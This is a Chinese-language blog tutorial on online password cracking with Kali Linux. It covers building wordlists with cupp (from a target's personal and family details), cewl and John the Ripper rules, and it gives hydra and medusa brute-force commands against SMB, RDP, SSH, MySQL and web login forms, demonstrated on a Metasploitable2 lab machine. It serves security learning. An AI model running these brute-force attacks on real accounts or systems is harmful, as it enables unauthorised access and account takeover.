<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#6200ee"><meta name="author" content="m0re"><meta name="copyright" content="m0re"><meta name="generator" content="Hexo 5.1.0"><meta name="theme" content="hexo-theme-yun"><title>Kali Linux之在线密码破解 | m0re的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.24/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_j5gk85dg4pf.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" href="/m0re.ico"><link rel="mask-icon" href="/m0re.ico" color="#6200ee"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"m0re.top","root":"/","title":"人生路漫漫","version":"1.6.1","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="前言：这次学习密码破解类型的知识。本篇文章是在线密码破解模块。 平时收集各种字典，或者github上的一些项目收集。  放个github项目，一个使用python3写的工具——cupp描述：按个人信息生成其专属字典。简单使用：使用cupp这个py文件，使用-i参数会进入一个交互模式，下面会问一些有关被破解者的一些信息。第一是他的姓名和生日信息，第二是父母的基本信息第三是孩子的信息还有宠物的信息，可">
<meta property="og:type" content="article">
<meta property="og:title" content="Kali Linux之在线密码破解">
<meta property="og:url" content="https://m0re.top/posts/5e1256/index.html">
<meta property="og:site_name" content="m0re的小站">
<meta property="og:description" content="前言：这次学习密码破解类型的知识。本篇文章是在线密码破解模块。 平时收集各种字典，或者github上的一些项目收集。  放个github项目，一个使用python3写的工具——cupp描述：按个人信息生成其专属字典。简单使用：使用cupp这个py文件，使用-i参数会进入一个交互模式，下面会问一些有关被破解者的一些信息。第一是他的姓名和生日信息，第二是父母的基本信息第三是孩子的信息还有宠物的信息，可">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004112012705.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004112238421.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004114646650.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004114806761.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004120911440.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004121036392.png#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020100412160469.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004121806933.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004141454186.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004143739874.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20201004152514312.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center">
<meta property="article:published_time" content="2020-10-04T07:28:54.080Z">
<meta property="article:modified_time" content="2020-10-04T07:31:45.202Z">
<meta property="article:author" content="m0re">
<meta property="article:tag" content="密码破解">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20201004112012705.png"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button sidebar-nav-active" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel sidebar-panel-active" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="m0re"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="m0re"><span class="site-author-status" title="穷鬼啊啊啊啊">😭</span></a><div class="site-author-name"><a href="/about/">m0re</a></div><span class="site-name">m0re的小站</span><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">123</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">22</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">54</span></a></div><a class="site-state-item hty-icon-button" href="/Tools/" title="Tools"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/zxcv0221" title="GitHub" target="_blank" style="color:#181717"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="哔哩哔哩动画" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://twitter.com/ISm0r3" title="Twitter" target="_blank" style="color:#1da1f2"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-twitter-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:m0re.lxj@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content">很遗憾，咱没写啥目录</div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://m0re.top/posts/5e1256/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="m0re"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="m0re的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">Kali Linux之在线密码破解</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <span class="post-meta-icon-text">发表于</span> <time title="创建时间：2020-10-04 15:28:54" itemprop="dateCreated datePublished" datetime="2020-10-04T15:28:54+08:00">2020-10-04</time></div><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><span class="leancloud_visitors" id="/posts/5e1256/" data-flag-title="Kali Linux之在线密码破解"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/kali/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">kali</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/%E5%AF%86%E7%A0%81%E7%A0%B4%E8%A7%A3/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">密码破解</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#6200ee;"><p>前言：这次学习密码破解类型的知识。本篇文章是在线密码破解模块。</p>
<p>平时收集各种字典，或者github上的一些项目收集。</p>
<ol>
<li>放个github项目，<br>一个使用python3写的工具——<a target="_blank" rel="noopener" href="https://github.com/Mebus/cupp">cupp</a><br>描述：按个人信息生成其专属字典。<br>简单使用：<br><img src="https://img-blog.csdnimg.cn/20201004112012705.png" alt="m0re" loading="lazy"><br>使用cupp这个py文件，使用<code>-i</code>参数会进入一个交互模式，下面会问一些有关被破解者的一些信息。<br><img src="https://img-blog.csdnimg.cn/20201004112238421.png" alt="m0re" loading="lazy"><br>第一是他的姓名和生日信息，<br>第二是父母的基本信息<br>第三是孩子的信息<br>还有宠物的信息，可以省略不写。<br>最后红框里的是是否要加一些关键词、一些特殊字符、一些随机数。<br>然后就会生成以他名字命名的一个字典。</li>
<li><code>cewl</code>一个kali中自带的工具，使用<code>--help</code>查看使用参数<br>简单使用<pre class="language-bash" data-language="bash"><code class="language-bash">cewl <span class="token number">1.1</span>.1.1 -m <span class="token number">3</span> -d <span class="token number">3</span> -e -c -v -w a.txt
-m :最小单词长度
-d :爬网深度
-e :收集包含email地址信息
-c :每个单词出现次数
支持基本、摘要 身份验证
支持代理</code></pre>
emmm因为我自己的小网站爬不到东西，所以就爬百度了<br><img src="https://img-blog.csdnimg.cn/20201004114646650.png#pic_center" alt="m0re" loading="lazy"><br>然后看生成的字典<br><img src="https://img-blog.csdnimg.cn/20201004114806761.png" alt="m0re" loading="lazy"></li>
</ol>
<p>用户密码变型</p>
<ul>
<li>基于cewl的结果进行密码变型</li>
<li>末尾增加数字串</li>
<li>字母大小写变化</li>
<li>字母与符号相互转换</li>
<li>字母与数字相互转换</li>
<li><code>P@$$w0rd</code></li>
</ul>
<ol start="3">
<li><p>使用John the Ripper配置文件实现密码动态变型<br>规则保存在<code>/etc/john/john.conf</code><br>首先截取一下一个范例字典<br><img src="https://img-blog.csdnimg.cn/20201004120911440.png" alt="m0re" loading="lazy"><br>规则可以自己在<code>john.conf</code>中进行配置。<br>然后使用命令</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">john --wordlist<span class="token operator">=</span>pass.lst --rules --stdout <span class="token operator">></span> password.txt</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20201004121036392.png#pic_center" alt="m0re" loading="lazy"><br>配置规则较简单的话，很快就跑出来了。<br>配置的话，在这个位置<br><img src="https://img-blog.csdnimg.cn/2020100412160469.png" alt="m0re" loading="lazy"></p>
</li>
<li><p>在线密码破解——hydra<br><img src="https://img-blog.csdnimg.cn/20201004121806933.png" alt="m0re" loading="lazy"><br>九头蛇。<br>下面是几种破解方式(命令)</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">Windows密码破解
-  hydra -l administrator -P pass.txt smb://1.1.1.1
-  hydra -l administrator -P pass.txt rdp://1.1.1.1
linux密码破解
-  hydra -l root -P pass.txt ssh://1.1.1.1</code></pre>
<p>图形化界面xhydra<br><img src="https://img-blog.csdnimg.cn/20201004141454186.png" alt="m0re" loading="lazy"><br>玩不转命令行的可以尝试这个。<br>下面就使用metasploitable2靶机来试试爆破密码。<br>首先使用root登录。然后保证字典中有正确的密码。<br>保证主机能够ping通。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">hydra -l root -P a.txt ssh://192.168.2.133 -t <span class="token number">1</span> -vV
-t参数是限制并发数，防止被拒绝连接。</code></pre>
<p>不过会比较慢一点。<br>不过这个是个靶机，应该不会有这样的设置，但是还是多等一会比较保险。<br><img src="https://img-blog.csdnimg.cn/20201004143739874.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>这里已经爆破成功，就是时间有点慢，其他的还行。如果想快一点，可以将正确密码放在靠前的位置。</p>
</li>
</ol>
<p>http表单身份验证。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">hydra -l admin -P pass.txt <span class="token number">1.1</span>.1.1 http-post-form <span class="token string">"/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=Login:S=index.php"</span> -t <span class="token number">1</span> -V</code></pre>
<p>进行测试。<br>注：在index.php处，是指定返回正确的标志，吐过登录成功，返回页面中肯定是包含index.php，所以就设置<code>Login:S=index.php</code><br>然后就是等待破解。</p>
<ol start="5">
<li>在线密码破解——medusa<br>Hydra的缺点</li>
</ol>
<ul>
<li>稳定性差，程序时常崩溃</li>
<li>速度控制不好，容易触发服务屏蔽或锁死机制</li>
<li>没主机新建进程，没服务新建实例</li>
<li>大量目标破解时性能差<br>Medusa的特点</li>
<li>稳定性好</li>
<li>速度控制得当</li>
<li>基于线程</li>
<li>支持模块少于hydra（不支持RDP）</li>
<li>web-form支持存在缺陷<br>简单使用<pre class="language-bash" data-language="bash"><code class="language-bash">medusa 破解windows密码
medusa -M smbnt -h <span class="token number">1.1</span>.1.1 -u administrator -P pass.lst -e ns -F</code></pre>
参数解析<code>-F</code>表示如果检测到正确密码就不再继续检测。<br><code>-M</code>使用mod的名称<pre class="language-bash" data-language="bash"><code class="language-bash">medusa破解linux密码
medusa -M <span class="token function">ssh</span> -h <span class="token number">1.1</span>.111.1 -u root -P pass.lst -e ns -F</code></pre>
其他服务密码破解<pre class="language-bash" data-language="bash"><code class="language-bash">medusa -M mysql -h <span class="token number">1.1</span>.1.1 -u root -P pass.lst -e ns -F
medusa -h <span class="token number">1.1</span>.1.1 -u admin -P pass.lst -e ns -F
<span class="token comment">#表单破解</span>
medusa -h <span class="token number">1.1</span>.1.1 -u admin -P pass.lst -M web-form -m FROM:<span class="token string">"dvwa/login.php"</span> -m DENY-SIGNAL:<span class="token string">"login.php"</span> -m FROM-DATA:<span class="token string">"post?user=username&amp;pass=password&amp;Login=Login"</span></code></pre>
常用参数<pre class="language-bash" data-language="bash"><code class="language-bash">-n :非默认端口
-s :使用SSL连接
-T :并发主机数</code></pre>
medusa支持的模块<br><img src="https://img-blog.csdnimg.cn/20201004152514312.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>使用时，不需要加上<code>.mod</code>直接加名称就行。<br>详细使用，可以利用<code>-h</code>参数来研究。</li>
</ul>
<p>在线密码破解模块到此结束，下次学习离线密码破解。</p>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me a candy.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg"><img loading="lazy" src="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>m0re</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://m0re.top/posts/5e1256/" title="Kali Linux之在线密码破解">https://m0re.top/posts/5e1256/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/37b33e9e/" rel="prev" title="CTF题记—一些思考"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">CTF题记—一些思考</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/6c60c36a/" rel="next" title="CTF题记—ctfshow&amp;&amp;BUU"><span class="post-nav-text">CTF题记—ctfshow&amp;&amp;BUU</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>尝试使用 utterances （基于 GitHub Issues）评论系统。</span><br><span>您可以点击下方按钮切换对应评论系统，</span><br><span><script>function showUtterances(){ document.querySelector(".utterances").style.display='block'; document.querySelector('#valine-container').style.display='none'; }function showValine(){ document.querySelector('#valine-container').style.display='block'; document.querySelector(".utterances").style.display='none'; }</script></span><br><span><a class="hty-button hty-button--raised" onclick="showValine()">Valine</a><a class="hty-button hty-button--raised" onclick="showUtterances()">utterances</a></span><br><span><style>.utterances{display:none;}</style></span><br></div><div id="valine-container"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js", () => {
  const valineConfig = {"enable":true,"appId":"gUEA9zKLhCnMFxQI5kI20WiD-gzGzoHsz","appKey":"GQKAp04LNloy3MrDMv86MI3i","placeholder":"评论一下~&nbsp_(:з」∠)_ （填写邮箱可以收到回复通知～）","avatar":null,"pageSize":10,"visitor":true,"highlight":true,"recordIP":true,"enableQQ":true,"requiredFields":["nick","mail"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = "/posts/5e1256/"
  new Valine(valineConfig)
}, window.Valine);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">豫ICP备2020025591号-1</a></div><div class="copyright"><span>&copy; 2020 – 2022 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> m0re</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.1.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.6.1</span></div><div class="live_time"><span>本博客已苟延残喘了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-02-21T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#6200ee" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div id="local-search-result"></div></div></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"https://cdn.jsdelivr.net/npm/live2d-widget-model-wanko@1.0.5/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body></html>